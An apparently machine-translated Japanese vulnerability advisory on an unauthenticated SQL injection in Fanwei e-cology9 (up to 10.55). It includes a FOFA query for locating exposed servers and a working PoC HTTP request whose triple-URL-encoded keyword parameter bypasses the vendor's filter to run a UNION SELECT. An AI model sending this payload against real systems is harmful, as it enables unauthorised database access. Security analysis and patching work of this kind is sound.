1. 製品紹介
汎ミクロ連携管理アプリケーション プラットフォーム e-cology は、企業情報ポータル、ナレッジ ドキュメント管理、ワークフロー管理、人事管理、顧客関係管理、プロジェクト管理、財務管理、資産管理、サプライ チェーン管理、データ センター機能のセットです。大規模な共同管理プラットフォーム。
2. 脆弱性の概要
Fanwei e-cology9 には SQL インジェクションの脆弱性があり、認証されていないリモート攻撃者がこの脆弱性を利用してデータベースの機密情報を取得する可能性があり、さらに悪用されるとターゲット システムに料金が請求される可能性があります。
3. 影響範囲
影響を受けるバージョン
Fanwei e-cology9 <= 10.55
影響を受けていないバージョン
Fanwei e-cology9 >= 10.56
4. 環境を再現する
FOFA: app="Panwei-連携ビジネスシステム"
5. 脆弱性の再発
脆弱な環境にアクセスし、burp がパケットをキャプチャし、使用するリピーター モジュールを送信します。
現在インターネット上で流通している POC
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 651
isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537注: POC では 3 つのパラメータを渡す必要があります。
1. isDis は 1 でなければなりません
2. BrowserTypeId対応メソッド
3. キーワードは注入ポイントであり、Panwei のフィルタリング メカニズムを回避するには URL エンコードを 3 回実行する必要があります (Panwei のブラックリスト メカニズムはキーワードを全角文字に置き換えます)。
データベースのバージョン情報を問い合わせる
正常に再現されました
6. 修理のご提案
現在、正式なセキュリティパッチがリリースされており、影響を受けるユーザーはできるだけ早くバージョン10.56以降にアップグレードすることをお勧めします。
https://www.weaver.com.cn/cs/securityDownload.asp